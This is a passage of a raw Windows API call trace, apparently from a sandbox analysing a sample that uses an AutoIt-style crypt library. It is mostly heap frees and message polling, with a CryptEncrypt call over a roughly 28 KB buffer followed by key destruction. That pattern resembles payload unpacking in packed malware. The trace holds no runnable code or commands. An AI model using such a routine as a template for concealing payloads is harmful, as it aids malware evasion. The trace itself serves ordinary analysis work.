dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0171.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.993] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0171.994] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2728, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2728*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.995] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0171.996] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.996] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.996] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.997] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.997] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.997] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.997] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.999] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x6db5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x6dc0) returned 1 [0171.999] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.999] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.000] CharLowerBuffW (in: lpsz="byte[28097]", cchLength=0xb | out: lpsz="byte[28097]") returned 0xb [0172.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.000] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.001] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0x6db5, dwBufLen=0x6dc0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0x6dc0) returned 1 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.001] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.001] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.001] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.001] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.002] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.002] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.002] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.031] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.035] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.036] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.036] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.036] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0172.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.036] CryptDestroyKey (hKey=0x90af98) returned 1 [0172.036] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.036] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.037] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.037] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.037] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.038] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 